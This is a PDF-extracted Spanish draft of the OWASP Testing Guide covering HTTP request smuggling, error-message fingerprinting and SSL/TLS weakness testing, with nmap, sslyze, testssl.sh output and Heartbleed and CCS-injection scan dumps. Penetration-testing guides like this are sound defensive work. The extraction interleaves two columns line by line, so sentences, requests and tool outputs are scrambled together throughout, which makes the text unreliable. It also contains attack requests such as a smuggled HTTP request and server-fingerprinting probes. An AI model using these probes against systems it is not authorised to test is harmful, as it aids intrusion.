(navegadores, cachés web, aplicaciones de firewalls). Este relativamente Request #4
nuevo tipo de ataque fue descubierto por Chaim Linhart, Amit Klein,
Ronen Heled y Steve Orrin en 2005. Connection: Keep-Alive
<CRLF>
Host: target
Connection: Keep-Alive Por ejemplo, el protocolo HTTP permite sólo un encabezado Content-
Length, pero no especifica cómo manejar un mensaje que tiene dos
Content-Length: 49225 instancias de este encabezado. Algunas implementaciones utilizarán el
primero de ellos mientras que otras preferirán la segunda, limpiando el
<CRLF> camino para ataques de contrabando HTTP. Otro ejemplo es el uso del
encabezado Content-Length en un mensaje GET.
<49152 bytes of garbage>
Libros Blancos
Errores de servidor web
• Amit Klein, “Divide and Conquer: HTTP Response Splitting, Web Cache
Poisoning Attacks, and RelatedTopics”: packetstormsecurity.org Un error común que podemos ver durante la prueba es el HTTP 404 Not
Found. A menudo este código de error proporciona información útil sobre
• Chaim Linhart, Amit Klein, Ronen Heled, Steve Orrin: “HTTP Request el servidor web subyacente y componentes asociados. Por ejemplo:
Smuggling”: cgisecurity.com
Not Found
• Amit Klein: “HTTP Message Splitting, Smuggling and Other Animals”:
owasp.org The requested URL /page.html was not found on this server.
• Amit Klein: “HTTP Request Smuggling - ERRATA (the IIS 48K buffer Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7g DAV/2 PHP/5.1.2 Server at
phenomenon)”: securityfocus.com localhost Port 80
• Chaim Linhart, Amit Klein, Ronen Heled, Steve Orrin: “HTTP Request Este mensaje de error puede generarse por solicitar una URL no
Smuggling”: cgisecurity.com existente. Después del mensaje común que muestra una página no
encontrada, hay información sobre la versión del servidor web, sistema
operativo, módulos y otros productos utilizados. Esta información puede
ser muy importante desde el punto de vista de identificar el tipo y versión
Pruebas de errores de código (OTG-ERR-001)
del sistema operativo y aplicaciones.
Resumen
Los errores de base de datos son devueltos por el sistema de base de no maneja la excepción de una forma controlada. Esto puede ser causado
datos cuando hay un problema con la consulta o la conexión. Cada por un problema de resolución del nombre de la base de datos,
sistema de base de datos, como MySQL, Oracle o MSSQL, tiene su propio procesamiento de valores variable inesperados u otros problemas de red.
conjunto de errores. Esos errores pueden proporcionar información
confidencial como las IP del servidor de base de datos, tablas, columnas y
datos de inicio de sesión.
Considere el escenario donde tenemos un portal de administración de base de
datos, que puede utilizarse como un front-end GUI para emitir consultas de
base de datos, crear tablas y modificar campos de bases de datos. Durante el
Además, hay muchas técnicas de explotación de inyección SQL que POST de las credenciales de inicio de sesión, el siguiente mensaje de error se
utilizan los mensajes de error detallados desde el controlador de la base presenta en las pruebas de penetración. El mensaje indica la presencia de un
de datos. Para información más detallada sobre este tema vea Pruebas de servidor de base de datos MySQL:
inyecciones de SQL (OTG-INPVAL-005).
[DBNETLIB][ConnectionOpen(Connect())] - SQL server does not exist or access Si vemos en el código HTML de la página de inicio de sesión la presencia de
denied un campo oculto con una IP de una base de datos, podemos intentar cambiar
este valor en la URL con la dirección de un servidor de base de datos bajo el
control de evaluadores de penetración, en un intento de engañar a la
aplicación para que piense que la conexión fue exitosa.
¿Qué pasó? A continuación vamos a explicarlo paso a paso.
Otro ejemplo: sabiendo cuál es el servidor de base de datos que sirve a una
En este ejemplo, el 80004005 es un código de error IIS genérico que aplicación web, podemos aprovechar esta información para llevar a cabo una
indica que no pudo establecer una conexión con su base de datos inyección de SQL para ese tipo de base de datos o una prueba XSS
asociada. En muchos casos, el mensaje de error detalla el tipo de base de persistente.
datos. A menudo esto le indicará el sistema operativo subyacente por
asociación. Con esta información, el evaluador de penetración puede
planear una estrategia adecuada para la prueba de seguridad.
Cómo probar
Date: Sat, 04 Nov 2006 15:26:48 GMT Prueba: 400 Bad Request
... Resultado:
<address>Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7g at <host target> Server: Apache/2.2.22 (Ubuntu) PHP/5.3.10-1ubuntu3.9 with Suhosin-Patch
Port 80</address>
Vary: Accept-Encoding
Content-Length: 301
Prueba:
Connection: close
Problemas de red que llevan a que la aplicación no pueda acceder al servidor de
bases de datos Content-Type: text/html; charset=iso-8859-1
...
[MySQL][ODBC 3.51 Driver]Unknown MySQL server host <address>Apache/2.2.22 (Ubuntu) PHP/5.3.10-1ubuntu3.9 with Suhosin-Patch at
127.0.1.1 Port 80</address>
...
Prueba:
Server: Apache/2.2.22 (Ubuntu) PHP/5.3.10-1ubuntu3.9 with Suhosin-Patch <address>Apache/2.2.22 (Ubuntu) PHP/5.3.10-1ubuntu3.9 with Suhosin-Patch at
<host target> Port 80</address>
Allow: GET, HEAD, POST, OPTIONS
...
Vary: Accept-Encoding
Content-Length: 315
Prueba: 501 Method Not Implemented
Connection: close
telnet <host target> 80
Content-Type: text/html; charset=iso-8859-1
RENAME /index.html HTTP/1.1
...
Host: <host target>
<title>405 Method Not Allowed</title>
<CRLF><CRLF>
...
Prueba: 408 Request Time-out Server: Apache/2.2.22 (Ubuntu) PHP/5.3.10-1ubuntu3.9 with Suhosin-Patch
-Wait X seconds – (Depending on the target server, 21 seconds for Apache by Content-Length: 299
default)
Connection: close
Connection: close
... http://<host>/<dir>
Herramientas
<customErrors defaultRedirect=”myerrorpagedefault.aspx”
• ErrorMint : sourceforge.net mode=”On|Off|RemoteOnly”>
Referencias </customErrors>
• [RFC2616] ietf.org
End Sub
Handles MyBase.Error
Description: HTTP 404. The resource you are looking for (or one of its
dependencies) could have been removed, had its name
Jerarquía de errores en ASP .net
Si el servidor devuelve
Los administradores del sitio pueden gestionar sus propios errores con el
The page cannot be found archivo .htaccess si la directiva global AllowOverride está configurada
correctamente en apache2.conf [3]
http:\\www.mywebserver.com\anyrandomname.aspx Tomcat es un servidor HTTP para alojar aplicaciones JSP y Java Servlet. Por
defecto Tomcat muestra la versión del servidor en las respuestas de error
HTTP.
Si el servidor devuelve
Server Error in ‘/’ Application. La personalización de las respuestas de error se puede configurar en el
documento de configuración web.xml.
--------------------------------------------------------------------------------
<error-page>
<error-code>404</error-code> Todas las pruebas anteriores podrían llevar a errores de aplicación que pueden
contener restos de pila de datos. Se recomienda utilizar un comprobador
<location>/myerrorpagefor404.html</location> aleatorio adicional a cualquier prueba manual.
</error-page>
Resumen
Los rastros de pilas de datos no son vulnerabilidades por sí mismas, pero a Pruebas de Caja Gris
menudo revelan información que es interesante para un atacante. Los
atacantes intentan generar estos rastros de pila de datos mediante la alteración Buscar el código para las comunicaciones que causan una excepción
del ingreso a la aplicación web con peticiones HTTP con formato incorrecto y representada en una cadena o secuencia de salida. Por ejemplo, en Java podría
otros datos de ingreso. ser código en JSP que se ve asi:
Hay una variedad de técnicas que pueden provocar que mensajes de excepción Herramientas
se envíen en una respuesta HTTP. Tenga en cuenta que en la mayoría de los
casos se trata de una página HTML, pero las excepciones se pueden enviar • ZAP Proxy - https://www.owasp.org/index.php/OWASP_Zed_
como parte de las respuestas SOAP o REST también.
Attack_Proxy_Project
• Acceso a páginas internas sin autenticación. Los datos sensibles deben ser protegidos cuando se transmiten a través de la
red. Dichos datos pueden incluir credenciales y tarjetas de crédito del usuario.
• Esquivar el flujo de la aplicación. Como regla general, si los datos se deben proteger cuando se almacenan, se
deben proteger también durante la transmisión.
Aunque los cifrados de alto nivel se apoyan hoy en día y son utilizados SSL/TLS Ciphers/Protocols/Keys débiles
normalmente, algún error de configuración en el servidor puede utilizarse para
forzar el uso de un cifrado débil - o, en el peor caso, ningún cifrado - Históricamente, ha habido limitaciones determinadas por el gobierno de Estados
permitiendo a un atacante acceder al canal de comunicación supuestamente Unidos, que permiten la exportación del cifrado sólo de un tamaño de hasta 40
seguro. Otras configuraciones erróneas pueden usarse para un ataque de bits, una longitud de clave que podría ser rota y permitiría el descifrado de
negación de servicio. comunicaciones. Desde entonces, las regulaciones de exportación criptográfica se
han allanado a un tamaño de clave máximo de 128 bits.
Asuntos comúnes
Es importante comprobar que la configuración de SSL ha sido usada para evitar la
Se produce una vulnerabilidad si se utiliza el protocolo HTTP para transmitir puesta en marcha del soporte criptográfico que podría ser fácilmente derrotado.
información sensible [2] (e.g. credenciales transmitidas en HTTP [3]). Para alcanzar este objetivo, los servicios basados en SSL no deberían ofrecer la
posibilidad de escoger una suite de cifrado débil. Una suite de cifrado se especifica
mediante un protocolo de cifrado (por ejemplo, DES, RC4, AES), la longitud de
cifrado de clave (por ejemplo, 40, 56 o 128 bits) y un algoritmo de hash (SHA,
La presencia de un servicio SSL/TLS es buena, pero aumenta la superficie de MD5) utilizado para verificar la integridad.
ataque y pueden existir las siguientes vulnerabilidades:
Brevemente, los puntos clave para la determinación de la suite de cifrado son las
• Los protocolos SSL/TLS, cifrados, claves y renegociación, deben estar siguientes:
correctamente configurados.
• La presencia tanto de HTTP como HTTPS, lo cual se puede utilizar también para
interceptar tráfico [7], [8].
Es posible (por ejemplo, por medio de las directivas de configuración)
• La presencia de contenido mezclado de HTTPS y HTTP en la misma página, lo especificar qué suites de cifrado el servidor obedecerá. De esta manera, usted
cual puede usarse para filtrar información. puede controlar si las conversaciones con los clientes aceptarán solamente un
cifrado de 40 bits.
[2] El servidor envía un mensaje ServerHelloDone y espera una respuesta del • ¿Qué pasa si el nombre en el certificado y el nombre del servidor no coinciden?
cliente. Si esto sucede, puede sonar sospechoso. Por varias razones, esto no es tan raro
de ver. Un sistema puede albergar un número de hosts virtuales basados en el
nombre, que comparten la misma dirección IP y se identifican mediante el HTTP
1.1 Host: header information. En este caso, puesto que el protocolo de enlace
[3] Al recibir el mensaje de ServerHelloDone, el cliente verifica la validez del
SSL comprueba el certificado del servidor antes de que se procese la petición
certificado digital del servidor.
HTTP, no es posible asignar certificados diferentes a cada servidor virtual. Por
lo tanto, si el nombre del sitio y el nombre registrado en el certificado no
coinciden, tenemos una condición que típicamente se señala por parte del
navegador. Para evitar esto, deben utilizarse servidores virtuales basados en IP.
Para que la comunicación se establezca, se debe pasar una serie de controles
[33] y [34] describen técnicas para lidiar con este problema y permitir que los
sobre los certificados. Aunque hablar de la autenticación basada en SSL y
hosts virtuales basados en el nombre estén correctamente referenciados.
certificados está más allá del alcance de esta guía, esta sección se centrará en
los principales criterios involucrados en determinar la validez del certificado:
Otras vulnerabilidades
• Compruebe si la autoridad de certificación (CA) es conocida (es decir, una que
La presencia de un nuevo servicio, que escucha en un puerto tcp separado, puede
se considera de confianza);
generar vulnerabilidades tales como las de infraestructura si el software no está
actualizado [4]. Además, para la correcta protección de datos durante la
• Compruebe que el certificado es válido;
transmisión, la Cookie de sesión debe usar la bandera de seguridad [5] y algunas
directivas deben enviarse al navegador para aceptar sólo tráfico seguro (HSTS
• Compruebe que el nombre del sitio y el nombre registrado en el certificado
[6], CSP).
concuerden.
También hay algunos ataques que pueden utilizarse para interceptar el tráfico si
Vamos a examinar cada comprobación más detalladamente.
el servidor web expone la solicitud HTTP y HTTPS [6], [7] o en el caso de
recursos HTTP y HTTPS mezclados en la misma página.
Cómo probar Al momento de escribir este documento, estos criterios son ampliamente
reconocidos como una lista de verificación mínima:
Prueba de transmisión de datos sensibles en texto claro
Ejemplo 1. Autenticación básica en HTTP • La renegociación debe estar configurada correctamente (por ejemplo: Insecure
Renegotiation debe desactivarse, debido a ataques MiTM [12] y las
Un ejemplo típico es el uso de autenticación básica en HTTP porque con la renegociaciones iniciadas por el cliente deben desactivarse, debido a la
autenticación básica, después de iniciar sesión, las credenciales son vulnerabilidad de Negación de Servicio [13]).
codificadas - y no cifradas - en las cabeceras HTTP.
• No deben haber suites de nivel de cifrado Export (EXP), debido a que puede ser
$ curl -kis http://example.com/restricted/ fácilmente roto [10].
HTTP/1.1 401 Authorization Required • La longuitud de claves de los certificados X.509 deben ser fuertes (por ejemplo si
se utiliza RSA o DSA la clave debe ser de al menos 2048 bits).
Date: Fri, 01 Aug 2013 00:00:00 GMT
• Los certificados X.509 deben firmarse únicamente con algoritmos de hashing
WWW-Authenticate: Basic realm=”Restricted Area” seguros (por ejemplo. sin firma al usar MD5 hash, debido a a ataques de colisión
en este hash).
Accept-Ranges: bytes
• Las claves deben generarse con la correcta entropía (e.g, Claves débiles generadas
Vary: Accept-Encoding con Debian) [14].
Content-Length: 162
<body bgcolor=white> • MD5 no debe usarse, debido a los ataques de colisión conocidos. [35]
<h1>401 Authorization Required</h1> • RC4 no debe usarse, debido a los ataques cripto-analíticos [15].
• PCI-DSS v2.0 en el punto 4.1 requiere que las partes compatibles utilicen
La gran cantidad de suites de cifrado disponible y el rápido progreso en
«criptografía fuerte» sin definir precisamente los algoritmos y longitudes de las
criptoanálisis hacen de las pruebas del servidor SSL una tarea nada trivial.
claves. La interpretación común, basada parcialmente en las versiones anteriores de
la norma, es que el cifrado de la clave sea de al menos 128 bits, sin algoritmos de 22/tcp open ssh syn-ack OpenSSH 5.3 (protocol 2.0)
exportación fuertes y sin usar SSLv2 [19].
25/tcp open smtp syn-ack Exim smtpd 4.80
• Qualys SSL Labs Server Rating Guide [14], Depoloyment best practice [10] y
SSL Threat Model [20] han sido propuestos para estandarizar la configuración y 26/tcp open smtp syn-ack Exim smtpd 4.80
evaluación de servidor SSL. Pero está menos actualizada que SSL Server tool [21].
80/tcp open http syn-ack
• OWASP tiene un gran cantidad de recursos para SSL/TLS Security [22], [23],
[24], [25]. [26]. 110/tcp open pop3 syn-ack Dovecot pop3d
Algunas herramientas y escáneres tanto libres (por ejemplo SSLAudit [28] o 143/tcp open imap syn-ack Dovecot imapd
SSLScan [29]) como comerciales (por ejemplo Tenable Nessus [27]), pueden
utilizarse para evaluar las vulnerabilidades SSL/TLS. Pero debido a la evolución de 443/tcp open ssl/http syn-ack Apache
estas vulnerabilidades, una buena manera de probar es comprobar manualmente
con openssl [30] o utilice las herramientas de salida como ingreso para la 465/tcp open ssl/smtp syn-ack Exim smtpd 4.80
evaluación manual usando las referencias.
993/tcp open ssl/imap syn-ack Dovecot imapd
$ nmap -sV --reason -PN -n --top-ports 100 www.example.com Host is up (0.090s latency).
Starting Nmap 6.25 ( http://nmap.org ) at 2013-01-01 00:00 CEST rDNS record for 127.0.0.1: www.example.com
| ciphers: | compressors:
| ciphers: | compressors:
| ciphers: | compressors:
| TLS_RSA_WITH_RC4_128_SHA - strong Nmap done: 1 IP address (1 host up) scanned in 8.64 seconds
| compressors:
| ssl-enum-ciphers: ---
| ciphers: 0 s:******
| compressors: 2 s:******
| NULL i:******
Server certificate
-----BEGIN CERTIFICATE----- Ahora el evaluador puede escribir la primera línea de una solicitud HTTP y
luego R en una nueva línea.
******
HEAD / HTTP/1.1
-----END CERTIFICATE-----
R
subject=******
issuer=******
El servidor renegocia
---
RENEGOTIATING
No client certificate CA names sent
depth=2 C******
---
verify error:num=20:unable to get local issuer certificate
SSL handshake has read 3558 bytes and written 640 bytes
verify return:0
---
HEAD / HTTP/1.1
Compression: NONE
Expansion: NONE
HTTP/1.1 403 Forbidden ( The server denies the specified Uniform Resource
SSL-Session:
Locator (URL). Contact the server administrator. )
Protocol : TLSv1
Connection: close
Cipher : DES-CBC3-SHA
Pragma: no-cache
Session-ID: ******
Cache-Control: no-cache
Session-ID-ctx:
Content-Type: text/html
Master-Key: ******
Content-Length: 1792
Key-Arg : None
Against SSL/TLS) aprovecha una vulnerabilidad de CBC en TLS 1.0. CRIME DHE_RSA_WITH_3DES_EDE_CBC_SHA
(Compression Ratio Info-leak Made Easy) explota una vulnerabilidad de la
compresión de TLS, que debe deshabilitarse. Lo interesante es que la primera RSA_WITH_AES_128_CBC_SHA
solución para BEAST era el uso de RC4, pero esto ahora no es aconsejable debido
a los ataque criptoanalíticos a RC4 [15]. DHE_RSA_WITH_AES_128_CBC_SHA
RSA_WITH_AES_256_CBC_SHA
Una herramienta en línea para comprobar estos ataques es SSL Labs, pero puede DHE_RSA_WITH_AES_256_CBC_SHA
ser utilizada sólo con servidores de internet. También tome en cuenta que los datos
que se buscan se almacenarán en el servidor SSL Labs y también resultará alguna RSA_WITH_AES_128_CBC_SHA256
conexión de servidor de SSL Labs [21].
RSA_WITH_AES_256_CBC_SHA256
$ java -jar TestSSLServer.jar www3.example.com 443
RSA_WITH_CAMELLIA_128_CBC_SHA
Supported versions: SSLv3 TLSv1.0 TLSv1.1 TLSv1.2
DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
Deflate compression: no
DHE_RSA_WITH_AES_128_CBC_SHA256
Supported cipher suites (ORDER IS NOT SIGNIFICANT):
DHE_RSA_WITH_AES_256_CBC_SHA256
SSLv3
RSA_WITH_CAMELLIA_256_CBC_SHA
RSA_WITH_RC4_128_SHA
DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
RSA_WITH_3DES_EDE_CBC_SHA
TLS_RSA_WITH_SEED_CBC_SHA
DHE_RSA_WITH_3DES_EDE_CBC_SHA
TLS_DHE_RSA_WITH_SEED_CBC_SHA
RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_128_GCM_SHA256
DHE_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_256_GCM_SHA384
RSA_WITH_AES_256_CBC_SHA
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
DHE_RSA_WITH_AES_256_CBC_SHA
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
RSA_WITH_CAMELLIA_128_CBC_SHA
----------------------
DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
Server certificate(s):
RSA_WITH_CAMELLIA_256_CBC_SHA
******
DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
----------------------
TLS_RSA_WITH_SEED_CBC_SHA
Minimal encryption strength: strong encryption (96-bit or more)
TLS_DHE_RSA_WITH_SEED_CBC_SHA
Achievable encryption strength: strong encryption (96-bit or more)
(TLSv1.0: idem)
BEAST status: vulnerable
(TLSv1.1: idem)
CRIME status: protected
TLSv1.2
RSA_WITH_RC4_128_SHA
Ejemplo 6. Prueba de vulnerabilidades SSL/TLS con sslyze
RSA_WITH_3DES_EDE_CBC_SHA
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
255
Guia de pruebas 4.0 "Borrador"
Sslyze [33] es un python script que permite el escaneo masivo y resultados XML. Client-initiated Renegotiations: Rejected
El siguiente es un ejemplo de un escaneo normal. Es una de las herramientas más
completas y versátiles para SSL/TLS testing Secure Renegotiation: Supported
* Certificate :
REGISTERING AVAILABLE PLUGINS Validation w/ Mozilla’s CA Store: Certificate is NOT Trusted: unable to
get local issuer certificate
-----------------------------
Hostname Validation: MISMATCH
PluginSessionRenegotiation
Common Name: www.example.com
PluginCertInfo
Issuer: ******
PluginSessionResumption
Serial Number: ****
PluginOpenSSLCipherSuites
Not Before: Sep 26 00:00:00 2010 GMT
PluginCompression
Not After: Sep 26 23:59:59 2020 GMT
* OCSP Stapling :
* Session Renegotiation :
------------------------
SSLv2 NOT offered (ok)
SSLv3 offered
Ejemplo 7. Prueba SSL/TLS con testssl.sh
TLSv1 offered (ok)
Testssl.sh [38] es un shell script de Linux que proporciona un resultado claro para
facilitar la toma de decisiones. No solo puede revisar servidores web, pero también TLSv1.1 offered (ok)
servicios en otros puertos, soporta STARTTLS, SNI, SPDY y realiza algunas
revisiones en los encabezados HTTP también. TLSv1.2 offered (ok)
Es una herramienta muy fácil de usar. A continuación verá algunos ejemplos de SPDY/NPN not offered
resultados (sin colores):
########################################################
Null Cipher NOT offered (ok)
testssl.sh v2.0rc3 (https://testssl.sh)
Anonymous NULL Cipher NOT offered (ok)
($Id: testssl.sh,v 1.97 2014/04/15 21:54:29 dirkw Exp $)
Anonymous DH Cipher NOT offered (ok)
USO SIN NINGUNA GARANTIA. USELO BAJO SU PROPIO RIESGO! Export Cipher (general) NOT offered (ok)
Note que solo puede revisar el servidor comparandolo con lo que está DES Cipher NOT offered (ok)
disponible (codificadores/protocolos) localmente en su maquina
Triple DES Cipher offered
########################################################
Medium grade encryption offered
“myhost:/<mypath>/bin/openssl64”
--> Probando el servidor por defecto (Server Hello)
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
258
Guia de pruebas 4.0 "Borrador"
no PFS available
TLS server extensions: server name, renegotiation info, session ticket, Done now (2014-04-17 15:07) ---> owasp.org:443 <---
heartbeat
El RC4 parece generalmente disponible. Ahora pruebe cifrados específicos... Además, proporciona un prototipo (vía "testssl.sh -V") del mapeo de nombres
de suites de cifrado RFC a OpenSSL. El evaluador necesita el archivo
mapping-rfc.txt en el mismo directorio.
[0x05] RC4-SHA RSA RC4 128 Esta herramienta [99] es una combinación de varias herramientas con algunas
comprobaciones adicionales para complementar y hacer a las pruebas más
completas SSL. Soporta los siguientes controles:
• HeartBleed
• ChangeCipherSpec Injection
--> Probando respuestas de encabezados HTTP
• BREACH
• BEAST
HSTS no
• Forward Secrecy support
Server Apache
• RC4 support
Application (None)
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
259
Guia de pruebas 4.0 "Borrador"
• CRIME & TIME (si se detecta CRIME, también se reporta TIME) Type: Domain Validation Certificate (i.e. NON-Extended Validation Certificate)
• HSTS: Duración razonable de MAX-AGE Public key: Sun RSA public key, 1024 bits
• HTTPS Stripping
• Cache-Control =====================================
Certificate Validation:
===============================
Host Info: [!] Signed using Insufficient public key length 1024 bits
Host : localhost [!] Certificate Signer: Self-signed/Untrusted CA - verified with Firefox & Java
ROOT CAs.
Port : 443
Path : /login.php
=====================================
Certificate Info:
Checking localhost:443 for Heartbleed bug (CVE-2014-0160) ...
==================
[Vulnerable] Heartbeat response was 16384 bytes instead of 3! 127.0.0.1:443 is 0bd0: 00 00 00 00 00 00 00 00 00 12 7D 01 00 10 00 02 ..........}.....
vulnerable over SSLv3
[-] Displaying response (lines consisting entirely of null bytes are removed):
[-] Closing connection
0000: 02 FF FF 08 03 00 53 48 73 F0 7C CA C1 D9 02 04 ......SHs.|.....
[-] Connecting to 127.0.0.1:443 using TLSv1.0
0010: F2 1D 2D 49 F5 12 BF 40 1B 94 D9 93 E4 C4 F4 F0 ..-I...@........
[-] Sending ClientHello
0020: D0 42 CD 44 A2 59 00 02 96 00 00 00 01 00 02 00 .B.D.Y..........
[-] ServerHello received
0060: 1B 00 1C 00 1D 00 1E 00 1F 00 20 00 21 00 22 00 .......... .!.”.
[-] Sending Heartbeat
0070: 23 00 24 00 25 00 26 00 27 00 28 00 29 00 2A 00 #.$.%.&.’.(.).*.
[Vulnerable] Heartbeat response was 16384 bytes instead of 3! 127.0.0.1:443 is
0080: 2B 00 2C 00 2D 00 2E 00 2F 00 30 00 31 00 32 00 +.,.-.../.0.1.2. vulnerable over TLSv1.0
0090: 33 00 34 00 35 00 36 00 37 00 38 00 39 00 3A 00 3.4.5.6.7.8.9.:. [-] Displaying response (lines consisting entirely of null bytes are removed):
00a0: 3B 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00 42 00 ;.<.=.>.?.@.A.B.
0220: 60 C0 61 C0 62 C0 63 C0 64 C0 65 C0 66 C0 67 C0 `.a.b.c.d.e.f.g.
0240: 70 C0 71 C0 72 C0 73 C0 74 C0 75 C0 76 C0 77 C0 p.q.r.s.t.u.v.w.
[Vulnerable] Heartbeat response was 16384 bytes instead of 3! 127.0.0.1:443 is 0bd0: 00 00 00 00 00 00 00 00 00 12 7D 01 00 10 00 02 ..........}.....
vulnerable over TLSv1.1
[-] Displaying response (lines consisting entirely of null bytes are removed):
[-] Closing connection
0000: 02 FF FF 08 03 02 53 48 73 F0 7C CA C1 D9 02 04 ......SHs.|.....
[-] Connecting to 127.0.0.1:443 using TLSv1.2
0010: F2 1D 2D 49 F5 12 BF 40 1B 94 D9 93 E4 C4 F4 F0 ..-I...@........
[-] Sending ClientHello
0020: D0 42 CD 44 A2 59 00 02 96 00 00 00 01 00 02 00 .B.D.Y..........
[-] ServerHello received
0060: 1B 00 1C 00 1D 00 1E 00 1F 00 20 00 21 00 22 00 .......... .!.”.
[-] Sending Heartbeat
0070: 23 00 24 00 25 00 26 00 27 00 28 00 29 00 2A 00 #.$.%.&.’.(.).*.
[Vulnerable] Heartbeat response was 16384 bytes instead of 3! 127.0.0.1:443 is
0080: 2B 00 2C 00 2D 00 2E 00 2F 00 30 00 31 00 32 00 +.,.-.../.0.1.2. vulnerable over TLSv1.2
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
262
Guia de pruebas 4.0 "Borrador"
[-] Displaying response (lines consisting entirely of null bytes are removed):
0000: 02 FF FF 08 03 03 53 48 73 F0 7C CA C1 D9 02 04 ......SHs.|.....
0070: 23 00 24 00 25 00 26 00 27 00 28 00 29 00 2A 00 #.$.%.&.’.(.).*.
0080: 2B 00 2C 00 2D 00 2E 00 2F 00 30 00 31 00 32 00 +.,.-.../.0.1.2.
=====================================
0090: 33 00 34 00 35 00 36 00 37 00 38 00 39 00 3A 00 3.4.5.6.7.8.9.:.
00a0: 3B 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00 42 00 ;.<.=.>.?.@.A.B.
Loading module: CCS Injection script by TripWire VERT ...
00b0: 43 00 44 00 45 00 46 00 60 00 61 00 62 00 63 00 C.D.E.F.`.a.b.c.
00c0: 64 00 65 00 66 00 67 00 68 00 69 00 6A 00 6B 00 d.e.f.g.h.i.j.k.
Checking localhost:443 for OpenSSL ChangeCipherSpec (CCS) Injection bug
00d0: 6C 00 6D 00 80 00 81 00 82 00 83 00 84 00 85 00 l.m............. (CVE-2014-0224) ...
01a0: 20 C0 21 C0 22 C0 23 C0 24 C0 25 C0 26 C0 27 C0 .!.”.#.$.%.&.’.
01b0: 28 C0 29 C0 2A C0 2B C0 2C C0 2D C0 2E C0 2F C0 (.).*.+.,.-.../. [!] The target may allow early CCS on TLSv1.2
01c0: 30 C0 31 C0 32 C0 33 C0 34 C0 35 C0 36 C0 37 C0 0.1.2.3.4.5.6.7. [!] The target may allow early CCS on TLSv1.1
01d0: 38 C0 39 C0 3A C0 3B C0 3C C0 3D C0 3E C0 3F C0 8.9.:.;.<.=.>.?. [!] The target may allow early CCS on TLSv1
01e0: 40 C0 41 C0 42 C0 43 C0 44 C0 45 C0 46 C0 47 C0 @.A.B.C.D.E.F.G. [!] The target may allow early CCS on SSLv3
01f0: 48 C0 49 C0 4A C0 4B C0 4C C0 4D C0 4E C0 4F C0 H.I.J.K.L.M.N.O.
0200: 50 C0 51 C0 52 C0 53 C0 54 C0 55 C0 56 C0 57 C0 P.Q.R.S.T.U.V.W.
0210: 58 C0 59 C0 5A C0 5B C0 5C C0 5D C0 5E C0 5F C0 X.Y.Z.[.\.].^._. [-] This is an experimental detection script and does not definitively determine
vulnerable server status.
0220: 60 C0 61 C0 62 C0 63 C0 64 C0 65 C0 66 C0 67 C0 `.a.b.c.d.e.f.g.
0230: 68 C0 69 C0 6A C0 6B C0 6C C0 6D C0 6E C0 6F C0 h.i.j.k.l.m.n.o.
[!] Potentially vulnerable to OpenSSL ChangeCipherSpec (CCS) Injection
0240: 70 C0 71 C0 72 C0 73 C0 74 C0 75 C0 76 C0 77 C0 p.q.r.s.t.u.v.w. vulnerability (CVE-2014-0224) mentioned in http://ccsinjection.lepidum.co.jp/
02c0: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
02d0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
0bd0: 00 00 00 00 00 00 00 00 00 12 7D 01 00 10 00 02 ..........}.....
=====================================
[*] HTTP Compression: DISABLED
HTTP/1.1 200 OK
Server: Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7 --------------- RAW HTTP RESPONSE ---------------
X-Powered-By: PHP/5.4.7
</head>
<body> <html>
<body> =====================================
<script src=”http://othersite/test.js”></script>
[!] Browsers, Proxies and other Intermediaries will cache SSL page and sensitive
information will be leaked.
=====================================
[!] Vulnerability Status: VULNERABLE
Checking localhost for HTTP support against HTTPS Stripping attack ...
-------------------------------------------------
[!] HTTP Support on port [80] : SUPPORTED
- Ref:
https://www.owasp.org/index.php/Testing_for_Browser_cache_weakness_(OTG-
===================================== AUTHN-006)
http://msdn.microsoft.com/en-us/library/ms533020(v=vs.85).aspx
=====================================
[!] Vulnerable to MITM malicious content injection attack Checking localhost:443 for Surf Jacking vulnerability (due to Session Cookie
missing secure flag) ...
[!] Vulnerability Status: VULNERABLE
--------------- RAW HTTP RESPONSE --------------- [!] Vulnerable to MITM attack described in
HTTP/1.1 200 OK
X-Powered-By: PHP/5.4.7
Content-Length: 193
Content-Type: text/html
=====================================
Checking localhost:443 for ECDHE/DHE ciphers against FORWARD SECRECY [*] Immune from BEAST attack mentioned in
support ... http://www.infoworld.com/t/security/red-alert-https-has-been-hacked-174025
[*] Attackers will NOT be able to decrypt sniffed SSL packets even if they have
compromised private keys. =====================================
=====================================
https://www.thc.org/thc-ssl-dos/ TLS_ECDH_anon_WITH_RC4_128_SHA
TLS_ECDH_anon_WITH_AES_256_CBC_SHA
[*] Immune from TLS Plain-text Injection attack (CVE-2009-3555) - (TLSv1.2: same as above)
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555
=====================================
[*] SSL version 2 : NOT SUPPORTED
TLS_RSA_WITH_AES_256_GCM_SHA384
Supported LANE cipher suites:
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
SSLv3
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
RSA_EXPORT_WITH_RC4_40_MD5
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
RSA_EXPORT_WITH_RC2_CBC_40_MD5
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
RSA_EXPORT_WITH_DES40_CBC_SHA
RSA_WITH_DES_CBC_SHA
DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
[*] GCM/CCM ciphers : SUPPORTED
DHE_RSA_WITH_DES_CBC_SHA
[*] Immune from Lucky13 attack mentioned in
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
267
